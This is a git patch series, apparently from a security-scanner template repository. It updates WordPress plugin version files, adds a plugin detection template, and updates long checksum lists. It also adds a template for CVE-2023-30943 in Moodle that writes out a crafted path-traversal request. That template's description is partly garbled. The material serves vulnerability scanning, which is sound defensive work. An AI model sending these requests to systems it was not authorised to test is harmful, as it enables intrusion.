files changed, 59 insertions(+), 9 deletions(-) create mode 100644 helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt create mode 100644 http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml diff --git a/helpers/wordpress/plugins/disable-comments.txt b/helpers/wordpress/plugins/disable-comments.txt index ab6d27898c..26f8b8bcdf 100644 --- a/helpers/wordpress/plugins/disable-comments.txt +++ b/helpers/wordpress/plugins/disable-comments.txt @@ -1 +1 @@ -2.4.4 \ No newline at end of file +2.4.5 \ No newline at end of file diff --git a/helpers/wordpress/plugins/jetpack-boost.txt b/helpers/wordpress/plugins/jetpack-boost.txt index 10bf840ed5..f93ea0ca33 100644 --- a/helpers/wordpress/plugins/jetpack-boost.txt +++ b/helpers/wordpress/plugins/jetpack-boost.txt @@ -1 +1 @@ -2.0.1 \ No newline at end of file +2.0.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/limit-login-attempts-reloaded.txt b/helpers/wordpress/plugins/limit-login-attempts-reloaded.txt index 7635ae4a27..641c2ba3f7 100644 --- a/helpers/wordpress/plugins/limit-login-attempts-reloaded.txt +++ b/helpers/wordpress/plugins/limit-login-attempts-reloaded.txt @@ -1 +1 @@ -2.25.23 \ No newline at end of file +2.25.24 \ No newline at end of file diff --git a/helpers/wordpress/plugins/newsletter.txt b/helpers/wordpress/plugins/newsletter.txt index ac2f3747d9..e048e60ec1 100644 --- a/helpers/wordpress/plugins/newsletter.txt +++ b/helpers/wordpress/plugins/newsletter.txt @@ -1 +1 @@ -7.9.1 \ No newline at end of file +7.9.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woo-checkout-field-editor-pro.txt b/helpers/wordpress/plugins/woo-checkout-field-editor-pro.txt index abb1658232..ee672d89ab 100644 --- a/helpers/wordpress/plugins/woo-checkout-field-editor-pro.txt +++ b/helpers/wordpress/plugins/woo-checkout-field-editor-pro.txt @@ -1 +1 @@ -1.9.0 \ No newline at end of file +1.9.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-google-maps.txt b/helpers/wordpress/plugins/wp-google-maps.txt index e844d46824..4bb0f27a14 100644 --- a/helpers/wordpress/plugins/wp-google-maps.txt +++ b/helpers/wordpress/plugins/wp-google-maps.txt @@ -1 +1 @@ -9.0.23 \ No newline at end of file +9.0.24 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-mail-smtp.txt b/helpers/wordpress/plugins/wp-mail-smtp.txt index 00e897bdae..b72ad011fa 100644 --- a/helpers/wordpress/plugins/wp-mail-smtp.txt +++ b/helpers/wordpress/plugins/wp-mail-smtp.txt @@ -1 +1 @@ -3.8.2 \ No newline at end of file +3.9.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt b/helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt new file mode 100644 index 0000000000..41c25a1861 --- /dev/null +++ b/helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt @@ -0,0 +1 @@ +10.5 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-statistics.txt b/helpers/wordpress/plugins/wp-statistics.txt index 10a0818792..0729fcac88 100644 --- a/helpers/wordpress/plugins/wp-statistics.txt +++ b/helpers/wordpress/plugins/wp-statistics.txt @@ -1 +1 @@ -14.1.5 \ No newline at end of file +14.1.6 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-user-avatar.txt b/helpers/wordpress/plugins/wp-user-avatar.txt index 01b73abe55..6a6a6933b0 100644 --- a/helpers/wordpress/plugins/wp-user-avatar.txt +++ b/helpers/wordpress/plugins/wp-user-avatar.txt @@ -1 +1 @@ -4.13.0 \ No newline at end of file +4.13.1 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml new file mode 100644 index 0000000000..56dfdf4a59 --- /dev/null +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -0,0 +1,49 @@ +id: wordpress-wp-reviews-plugin-for-google + +info: + name: Widgets for Google Reviews Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/wp-reviews-plugin-for-google/ + metadata: + plugin_namespace: wp-reviews-plugin-for-google + wpscan: https://wpscan.com/plugin/wp-reviews-plugin-for-google + tags: tech,wordpress,wp-plugin,top-200 + +http: + - method: GET + + path: + - "{{BaseURL}}/wp-content/plugins/wp-reviews-plugin-for-google/readme.txt" + + payloads: + last_version: helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt + + extractors: + - type: regex + part: body + internal: true + name: internal_detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' From 83bb3b47664a673d7639325e4fa138c77d67b38c Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 31 Aug 2023 10:04:29 +0530 Subject: [PATCH 0026/1090] Create CVE-2023-30943.yaml --- http/cves/2023/CVE-2023-30943.yaml | 45 ++++++++++++++++++++++++++++++ 1 file changed, 45 insertions(+) create mode 100644 http/cves/2023/CVE-2023-30943.yaml diff --git a/http/cves/2023/CVE-2023-30943.yaml b/http/cves/2023/CVE-2023-30943.yaml new file mode 100644 index 0000000000..897865c6d3 --- /dev/null +++ b/http/cves/2023/CVE-2023-30943.yaml @@ -0,0 +1,45 @@ +id: CVE-2023-30943 + +info: + name: Moodle - Cross-Site Scripting + author: ritikchaddha + severity: medium + description: | + The vulnerability was found Moodle which exists because the application allows a user to control path of the older to create in TinyMCE loaders. A remote user can send a specially crafted HTTP request and create arbitrary folders on the system. + reference: + - https://www.sonarsource.com/blog/playing-dominos-with-moodles-security-1/?utm_source=twitter&utm_medium=social&utm_campaign=wordpress&utm_content=security&utm_term=mofu + - https://nvd.nist.gov/vuln/detail/CVE-2023-30943 + metadata: + max-request: 2 + tags: cve,cve2023,moodle,xss + +http: + - raw: + - | + GET /lib/editor/tiny/loader.php?rev=a/../../../../html/pix/f/.png HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + - | + GET /admin/tool/filetypes/edit.php?name=add HTTP/1.1 + Host: {{Hostname}} + + host-redirects: true + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + - "moodle" + condition: and + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 6ccc145b758d8bf8f5459e0952edaf05248ba810 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 31 Aug 2023 05:30:16 +0000 Subject: [PATCH 0027/1090] Auto Generated New Template Addition List [Thu Aug 31 05:30:16 UTC 2023] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 79ab8a5212..e16eeb61b8 100644 --- a/.new-additions +++ b/.new-additions @@ -3,6 +3,7 @@ http/cves/2016/CVE-2016-10108.yaml http/cves/2020/CVE-2020-11798.yaml http/cves/2022/CVE-2022-22897.yaml http/cves/2023/CVE-2023-20073.yaml +http/cves/2023/CVE-2023-26469.yaml http/cves/2023/CVE-2023-27034.yaml http/cves/2023/CVE-2023-30150.yaml http/cves/2023/CVE-2023-32563.yaml @@ -13,6 +14,7 @@ http/exposed-panels/greenbone-panel.yaml http/misconfiguration/ecology-info-leak.yaml http/misconfiguration/php-debugbar-exposure.yaml http/takeovers/lemlist-takeover.yaml +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml http/technologies/wordpress/plugins/wp-seopress.yaml http/vulnerabilities/hikvision/hikvision-fastjson-rce.yaml http/vulnerabilities/hikvision/hikvision-ivms-file-upload-bypass.yaml From 4c46a49deb1983f967471707a85538b33e2d96b2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 31 Aug 2023 05:30:23 +0000 Subject: [PATCH 0028/1090] Auto Generated Templates Checksum [Thu Aug 31 05:30:23 UTC 2023] :robot: --- templates-checksum.txt | 447 +++++++++++++++++++++-------------------- 1 file changed, 225 insertions(+), 222 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 67b17959b2..e2f96ecb31 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -402,7 +402,7 @@ helpers/wordpress/plugins/creative-mail-by-constant-contact.txt:5c09cf3589e93781 helpers/wordpress/plugins/custom-css-js.txt:40c77b21aca06ae8ad4f43edd798f21a5571e995 helpers/wordpress/plugins/custom-fonts.txt:d1325bb186bd83303245e504f7c6eceae7f19e44 helpers/wordpress/plugins/custom-post-type-ui.txt:6f8ae49c8330db0117068d4ee1b0515e49b98212 -helpers/wordpress/plugins/disable-comments.txt:8f52888ff7e35fd5ca310231fa076be1206b49bd +helpers/wordpress/plugins/disable-comments.txt:885717c949656aacb397735714a117bba20af139 helpers/wordpress/plugins/disable-gutenberg.txt:bdc1408a91f161dab5a9893d23db3c7095200e1d helpers/wordpress/plugins/duplicate-page.txt:69a192666c004f35303d55baa6cc828eb977144f helpers/wordpress/plugins/duplicate-post.txt:59a7597c10f2e831aaf8a6526fb9a13e25ea680e @@ -431,11 +431,11 @@ helpers/wordpress/plugins/ga-google-analytics.txt:48c07757afb07916aaceb81724ecfe helpers/wordpress/plugins/gdpr-cookie-compliance.txt:7595370f531837f97f90c203150920b879338d73 helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt:be1f3ed636fa57d09193a4000944b026539f2ae8 helpers/wordpress/plugins/google-analytics-for-wordpress.txt:a62f0cd70e2969845fd702e631526007e426ec31 -helpers/wordpress/plugins/google-listings-and-ads.txt:c955a071223dbc4ae3893b0d1dc4db00dd77d91f -helpers/wordpress/plugins/google-site-kit.txt:2a1ecd0865cf9f0cf108581f7ef983c057b16522 +helpers/wordpress/plugins/google-listings-and-ads.txt:c78453b22ddacc88b67ece8b294a6b5930f15836 +helpers/wordpress/plugins/google-site-kit.txt:2d61b8dd1d2334f5ff6b9c2010bf4078470db01d helpers/wordpress/plugins/google-sitemap-generator.txt:05a4815f734948e3bc0149a6d2d11169a1825f61 helpers/wordpress/plugins/gtranslate.txt:513cc2cbdbaafc4b88110a8732fa6d6886d54ff5 -helpers/wordpress/plugins/gutenberg.txt:9f53fbdab55466cefaf599f5bceaef6d80f925de +helpers/wordpress/plugins/gutenberg.txt:c0efed1067cd93e221bc8de8ca57acf6011c6273 helpers/wordpress/plugins/happy-elementor-addons.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf helpers/wordpress/plugins/header-and-footer-scripts.txt:bf64dd8c92190417a38d834b0c92eee4be757761 helpers/wordpress/plugins/header-footer-code-manager.txt:c2e02b33da3f80da726e9cf198552626bb5042e8 @@ -446,24 +446,24 @@ helpers/wordpress/plugins/hello-dolly.txt:a9901643b6482a446e950927fd0e6f0e9fb017 helpers/wordpress/plugins/host-webfonts-local.txt:e1153a589f6a6a243a8374b1e372cf2e69de87fc helpers/wordpress/plugins/imagify.txt:d24fa45ca77f079cc359c97272276969e6aead2c helpers/wordpress/plugins/imsanity.txt:8833d6b9ff65739ec437d2754b9fc885e202a555 -helpers/wordpress/plugins/insert-headers-and-footers.txt:d24fa45ca77f079cc359c97272276969e6aead2c +helpers/wordpress/plugins/insert-headers-and-footers.txt:32fecb37588747cdb8227230edc41ff2ca6557e1 helpers/wordpress/plugins/instagram-feed.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/intuitive-custom-post-order.txt:2aa887540d97ffa062fa8604e7ecde642f7080e6 helpers/wordpress/plugins/iwp-client.txt:9f028fa080dca632a19e807c2a3570f67ae71de3 -helpers/wordpress/plugins/jetpack-boost.txt:9ff4120c2315a5db674958e00529bc95c08b0e76 +helpers/wordpress/plugins/jetpack-boost.txt:d03f659256ae48f1c9a26c5aaec38d4360485288 helpers/wordpress/plugins/jetpack.txt:90db4c034fdf9f384fce435b9f9b57de9906c45c helpers/wordpress/plugins/kadence-blocks.txt:f6eab21f4096ab86124a60f5d8ae48626e598de9 helpers/wordpress/plugins/kirki.txt:5d8c63c6b430d2d7a19d0713fe2378eab9b1edfa helpers/wordpress/plugins/leadin.txt:4ea6749184af2616dda4c6d36597b267338ca299 -helpers/wordpress/plugins/limit-login-attempts-reloaded.txt:59869f3d40f57164ebfd545a33a2ddeaaf19fe13 +helpers/wordpress/plugins/limit-login-attempts-reloaded.txt:eb7b3babdf22a684d0ea8660470e63f0a4a6f2d6 helpers/wordpress/plugins/limit-login-attempts.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/litespeed-cache.txt:a2246273db175b4d951c8ae09a9b87d55b422463 helpers/wordpress/plugins/loco-translate.txt:5f099bc6f95ad230bf3e17b9745270e13ee50606 helpers/wordpress/plugins/loginizer.txt:9829113ed356f261f9202f78259f32919e9e5d9b helpers/wordpress/plugins/loginpress.txt:4ea93c6a1e320054f99d66f428e611b31355cd92 helpers/wordpress/plugins/mailchimp-for-woocommerce.txt:08d2e98e6754af941484848930ccbaddfefe13d6 -helpers/wordpress/plugins/mailchimp-for-wp.txt:2bf65a0d95209c8002516a0a1d50958c30cadfdb -helpers/wordpress/plugins/mailpoet.txt:610ef8722efc184c4a7a8f465cdcbb65f8efb594 +helpers/wordpress/plugins/mailchimp-for-wp.txt:d962fd9a839a218de0c95dddb4f7e937cdd40d38 +helpers/wordpress/plugins/mailpoet.txt:4e0e9b8af035e0887466f99581b3657149805e2c helpers/wordpress/plugins/maintenance.txt:254b136ca21ea7ce53096fd367ddb29c22a7cce9 helpers/wordpress/plugins/mainwp-child.txt:59a7597c10f2e831aaf8a6526fb9a13e25ea680e helpers/wordpress/plugins/malcare-security.txt:110e72e19320b384e7459b22647e5acdb0255c57 @@ -471,7 +471,7 @@ helpers/wordpress/plugins/megamenu.txt:403a4300e5939d1d7fbfb90958aac5b413468ba3 helpers/wordpress/plugins/members.txt:237c8767860dc44f0f30057d25e9143e3d0b425f helpers/wordpress/plugins/meta-box.txt:1f35081e09d2a2ed9d9cb39777ed8121a68d0cee helpers/wordpress/plugins/ml-slider.txt:32f71be2b08c58a10d49f26fdb35bf06c8f20122 -helpers/wordpress/plugins/newsletter.txt:60d712d9a12f5416daabb3565821281c3cba1d4c +helpers/wordpress/plugins/newsletter.txt:14665694dff2d37ef9323cf70015fe0466bea9b2 helpers/wordpress/plugins/nextend-facebook-connect.txt:deccc3cf363403cddb880388388bf192fbcfd655 helpers/wordpress/plugins/nextgen-gallery.txt:f2cc8874a54d8d40b341d84839c1b2984efc0aba helpers/wordpress/plugins/ninja-forms.txt:2aee11d7a9ddfedc94e7fb36aefcf9174d34d88b @@ -484,11 +484,11 @@ helpers/wordpress/plugins/password-protected.txt:5f099bc6f95ad230bf3e17b9745270e helpers/wordpress/plugins/pdf-embedder.txt:fe43108f583e1215970ae2e88527d0fbd89b7f58 helpers/wordpress/plugins/photo-gallery.txt:118daf97168a9a15434efdbbaa6d2dbe5614eec6 helpers/wordpress/plugins/php-compatibility-checker.txt:c117423da3e5e169d36e3111880b709d28e85308 -helpers/wordpress/plugins/pixelyoursite.txt:6fda2a4b2a29ba27b9e09a1d8ca3deca382262af +helpers/wordpress/plugins/pixelyoursite.txt:d8e23ca5790b46b3d6b48f23efe069ee480120e3 helpers/wordpress/plugins/polylang.txt:c7fc6bde7dbf4cb2d89ab4b2bd57e166ce750ec0 helpers/wordpress/plugins/popup-builder.txt:fc3e46507eb91f2ee9902bdf4b44b9e897b6eea7 helpers/wordpress/plugins/popup-maker.txt:2b3c6ac23cfffce2c714f7553284e912852ab2fe -helpers/wordpress/plugins/post-smtp.txt:8d75d2926196329b197f59e6385980edb0e38f17 +helpers/wordpress/plugins/post-smtp.txt:794118d2e1b864c8abdfea3e2039d9de9f0c9e16 helpers/wordpress/plugins/post-types-order.txt:31f566259c1a3f810256e3679e10faa457bb4a0b helpers/wordpress/plugins/premium-addons-for-elementor.txt:fba90fa57ee2b5dbb2faec1c33e96813ccb14fd5 helpers/wordpress/plugins/pretty-link.txt:4464e9f2e5e0cf52e9c26d3864e71249d73ea33a @@ -520,7 +520,7 @@ helpers/wordpress/plugins/the-events-calendar.txt:3a108f8e498bd0c9790af41f7f7d80 helpers/wordpress/plugins/themeisle-companion.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf helpers/wordpress/plugins/tinymce-advanced.txt:93ab266c89e9dcb536484607a605b05e657be940 helpers/wordpress/plugins/translatepress-multilingual.txt:b6ed966424606782d1fc2f9032f0fb0e4d237bd7 -helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt:cef8b08512cec8f1ab07ed0f568d56f767ca88fa +helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt:67c391fdae5d34abde64a1732ca064007569702b helpers/wordpress/plugins/under-construction-page.txt:7b482eb97a0d1e20b8b333a7435ce0e0bc59d15f helpers/wordpress/plugins/unyson.txt:08105b9ddd906ead00c6c2b76a45ffa54f0efc2d helpers/wordpress/plugins/updraftplus.txt:9441b7902302a4ce4ac4a62bf4918e281a22e6c8 @@ -532,15 +532,15 @@ helpers/wordpress/plugins/webp-converter-for-media.txt:2cb2c87ac5ebde3b1ed1d5d55 helpers/wordpress/plugins/webp-express.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/widget-importer-exporter.txt:92dd42eb7b198ffac6578eae5bcfc969383d138c helpers/wordpress/plugins/woo-cart-abandonment-recovery.txt:a9d2178a3e60db128675c6658f16be3165b8e0f1 -helpers/wordpress/plugins/woo-checkout-field-editor-pro.txt:57f75e869bf26cdb7eaddcd7bb1de6cfbb0594c3 +helpers/wordpress/plugins/woo-checkout-field-editor-pro.txt:381bb12da04a82580bb6d698b8798743668826bd helpers/wordpress/plugins/woo-variation-swatches.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.txt:5b7155a36d36681935655d772bbc981bc2393fa3 helpers/wordpress/plugins/woocommerce-gateway-stripe.txt:85e58fba8dcfa56b29939775178a4af11946316b helpers/wordpress/plugins/woocommerce-payments.txt:e0e8632bccfe7cb1511a277abb9bd5fbc2e087a6 -helpers/wordpress/plugins/woocommerce-paypal-payments.txt:bf64dd8c92190417a38d834b0c92eee4be757761 +helpers/wordpress/plugins/woocommerce-paypal-payments.txt:53847c48faeb5e255ebcdd1a4762a53f7163d7f0 helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt:cc1586242918f22469f32e7d30bae9a88f411c48 helpers/wordpress/plugins/woocommerce-services.txt:7cfe54f27289e2e996bf2e77df14202ff94111f9 -helpers/wordpress/plugins/woocommerce.txt:c7eeb53cfc290216febf25077730911f39c9a9fa +helpers/wordpress/plugins/woocommerce.txt:758e3631d239f1de32442015f0033cc31a84dcec helpers/wordpress/plugins/woosidebars.txt:a2048abb201b6201e7cd25e8b0262758a98d59da helpers/wordpress/plugins/wordfence.txt:40784b4a67e4ba8b48f28ea24427fa8550433cc1 helpers/wordpress/plugins/wordpress-importer.txt:08208ac734b4811a00c6728e5ae1c066d2e06cc8 @@ -548,21 +548,22 @@ helpers/wordpress/plugins/wordpress-seo.txt:18b66e1ee3dc142534c1d5c03f7bded8db5d helpers/wordpress/plugins/worker.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf helpers/wordpress/plugins/wp-fastest-cache.txt:a8ca9029438bddc6caceb1aae00246b568722654 helpers/wordpress/plugins/wp-file-manager.txt:9d90f00e19f5543904caf9ab2abd5b800e0613c0 -helpers/wordpress/plugins/wp-google-maps.txt:7b2eb157fa45e8a58dce97674070c539a9524987 -helpers/wordpress/plugins/wp-mail-smtp.txt:49845bdbd9ea8362a0f3bc2e6dad36c9121ce2d6 +helpers/wordpress/plugins/wp-google-maps.txt:7351876974e6ca881692e0a333a7d1724293977e +helpers/wordpress/plugins/wp-mail-smtp.txt:27e1606dc0a2a0c2fa59fc7f5fefdaeacc0b2794 helpers/wordpress/plugins/wp-maintenance-mode.txt:d3a5debecb62b3b70bbb48d3756a5239e112bc34 -helpers/wordpress/plugins/wp-migrate-db.txt:d3a5debecb62b3b70bbb48d3756a5239e112bc34 +helpers/wordpress/plugins/wp-migrate-db.txt:591d71e97a25db692c2f038dbb7d616569b743f4 helpers/wordpress/plugins/wp-multibyte-patch.txt:01fa77eedfbdd7455e8cf0cf239a4deb3041acfd helpers/wordpress/plugins/wp-optimize.txt:a80f092daaa12261340a5e337b2b07581bbb7e67 helpers/wordpress/plugins/wp-pagenavi.txt:53203701692767a1c2a24e47d94a090230bd8b3f helpers/wordpress/plugins/wp-reset.txt:1a907a1663fa62f8dac219d1a808e2abfcfa4f6a +helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt:1287384bc5ef3ab84a36a5ef1d888df2763567f4 helpers/wordpress/plugins/wp-rollback.txt:534467bb06aa6d8cb7e27ce2f48b87742c795cad helpers/wordpress/plugins/wp-seopress.txt:75c41cf137a9a31823a6e465d81658ce9077457c helpers/wordpress/plugins/wp-sitemap-page.txt:1ae2b3145aeda5c94e1cc83b23d74521cf9cc3c5 helpers/wordpress/plugins/wp-smushit.txt:5e74b23ed477d2de0db916790751da05ed4cee9c -helpers/wordpress/plugins/wp-statistics.txt:ba6836727c43276747538b05f07749b5b00bb410 +helpers/wordpress/plugins/wp-statistics.txt:ac32f8a4347b3f038cc4bd52d7ecaa8cd4774179 helpers/wordpress/plugins/wp-super-cache.txt:e9e533b0da8e5546eff821a40fbf7ca20ab9cf7e -helpers/wordpress/plugins/wp-user-avatar.txt:857c86f77d6f003739a489a24587e94a4838cfeb +helpers/wordpress/plugins/wp-user-avatar.txt:18b9862a81f078662fd384e5150e3cc638d8f73c helpers/wordpress/plugins/wpcf7-recaptcha.txt:255ee3124118ef39f0c2d984854cb0f180c4b1fe helpers/wordpress/plugins/wpcf7-redirect.txt:6dd1f25f2a4f5c9c73793bed06929318969169c0 helpers/wordpress/plugins/wpforms-lite.txt:2269ecf858a6c42d0d3451e7a6857f7331e60f35 @@ -2537,6 +2538,7 @@ http/cves/2023/CVE-2023-26067.yaml:17161963f5b64d22d25628b76ad1ce5cbc400e12 http/cves/2023/CVE-2023-26255.yaml:90d53de1cb7b92f8c8c90abaa0804fa4834f7e2c http/cves/2023/CVE-2023-26256.yaml:8f80f4ad83c38ab2be8233a5d1179b540de630f0 http/cves/2023/CVE-2023-26360.yaml:434aa078ca2c6ab2c4a5a772a072e2476f067a0f +http/cves/2023/CVE-2023-26469.yaml:289e55df1ce9b8c78e863ec45a1d7449d667909f http/cves/2023/CVE-2023-26842.yaml:d63739f63062fbcbf765be1faf13fbaa55240f54 http/cves/2023/CVE-2023-26843.yaml:cbe57b5f334f4204f7472275d2148cf16bb3a2db http/cves/2023/CVE-2023-27008.yaml:5abbc916932c4b7b2acba85cb5282055438ace8d @@ -5787,216 +5789,217 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498 http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813 http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114 -http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd -http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51 +http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed +http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724 -http/technologies/wordpress/plugins/akismet.yaml:b007755cc48a7a531a0e8fa3c452f9f74b483a5c -http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e -http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4 -http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f -http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07 -http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1 -http/technologies/wordpress/plugins/autoptimize.yaml:279ce12aeb07a219ddde6d8d3b8bdfe7854b545c -http/technologies/wordpress/plugins/backwpup.yaml:cd98534e9f211629ba533369d19b35889d667dff -http/technologies/wordpress/plugins/better-search-replace.yaml:f0fb1b87ddb8ba11b1b34fc352dcfe60ec8bd32a -http/technologies/wordpress/plugins/better-wp-security.yaml:366bc515c9eea0caf24103811f783af87309bc1e -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cf370287b480191433f14d22645180352e012309 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1d9ebeb7f6912abd70c1d5ff211c9bc312e8437c -http/technologies/wordpress/plugins/breeze.yaml:c9d3a0b31311eeb12035b292ea0beb6de100161d -http/technologies/wordpress/plugins/broken-link-checker.yaml:3632271104d26b8bca780450cc8bda6c00a2904a -http/technologies/wordpress/plugins/child-theme-configurator.yaml:3346ba95537fd3c405732fb81d7d459a22cd7eae -http/technologies/wordpress/plugins/classic-editor.yaml:7eac99fe2332bcd2d61540094502911352f9b299 -http/technologies/wordpress/plugins/classic-widgets.yaml:e5b45b37d0a85fd0e54c21716ca57f5ade443aa7 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9e23b288bbe247ec7fc8a1ee5be22e37886f5fd9 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0 +http/technologies/wordpress/plugins/akismet.yaml:c2fc28f9352683a8951ff433fcd774b49feaf0eb +http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc +http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2 +http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12 +http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b +http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226 +http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77 +http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46 +http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61 +http/technologies/wordpress/plugins/better-wp-security.yaml:31ac060d2dac4ff16c700f62cce3e478c5f0f66f +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f +http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b +http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365 +http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f +http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55 +http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3 http/technologies/wordpress/plugins/cloudflare.yaml:66dcdb39cea465cbf038ff429f48620493d09369 -http/technologies/wordpress/plugins/cmb2.yaml:eb137984c82ed5d64c29685b14a6c20d443be844 -http/technologies/wordpress/plugins/coblocks.yaml:0b67f9d55e292e698889ac4b63809c2468d3ed2c -http/technologies/wordpress/plugins/code-snippets.yaml:69feff2b5e8275ebd75f53eff59ee2a912f26636 -http/technologies/wordpress/plugins/coming-soon.yaml:679f3b88eb2da31b32e3180cceccd25d7f60e86e -http/technologies/wordpress/plugins/complianz-gdpr.yaml:35ff2d819699fc3c4d35d44702d09ec841fdb61d 